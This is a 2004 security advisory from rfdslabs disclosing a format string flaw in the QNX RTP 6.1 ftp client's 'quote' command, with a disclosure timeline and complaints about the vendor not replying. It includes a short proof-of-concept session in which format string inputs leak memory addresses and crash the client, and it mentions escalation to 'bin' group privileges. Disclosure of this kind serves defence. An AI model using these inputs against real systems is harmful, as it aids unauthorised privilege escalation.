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[RLSA_03-2004] QNX ftp client format string bug

               *** rfdslabs security advisory ***

Title: QNX ftp client format string bug [RLSA_03-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 13 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>

1. Introduction

   "QNX Software Systems has provided OS technology, development tools, and pro-
fessional services to companies building mission-critical embedded systems.
Since 1980 manufacturers have relied on QNX OS technology to power their 
missioncritical applications - everything from medical instruments and Internet
routers to telematics devices, 9-1-1 call centers, process control applications
and air traffic control systems. Small or large, simple or distributed, these
systems share an unmatched reputation for operating 24 hours a day, 365 days a
year, nonstop." (from http://www.qnx.com/products/rtos)

2. Details

   QNX 6.1 ftp client is vulnerable to a format string in 'quote' command.
If sucessfuly exploited, memory corruption occours and attackers can obtain
'bin' group priviledges. This kind of priviledge can be useful for backdooring
purposes, as an evil example.

# ftp
Connected to
220 sandimas FTP server (Version 5.60) ready.
Name ( sandimas
331 Password required for sandimas.
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)

3. Solution

   QNX Software Systems was contacted in september 8th but vendor didn't reply.
It seems they don't care much about security (they don't even have a security
staff e-mail, but SALES e-mail adddress is everywhere at qnx.com!).

4. Timeline

15 Aug 2004: Vulnerability detected;
08 Sep 2004: rfdslabs contacts QNX: no success;

Thanks to DataStorm Technologies and some stranger in mobius.qnx.com who was
intersted in rfdslabs.com.br.

www.rfdslabs.com.br - computers, sex, humand mind and more
Recife, PE, Brazil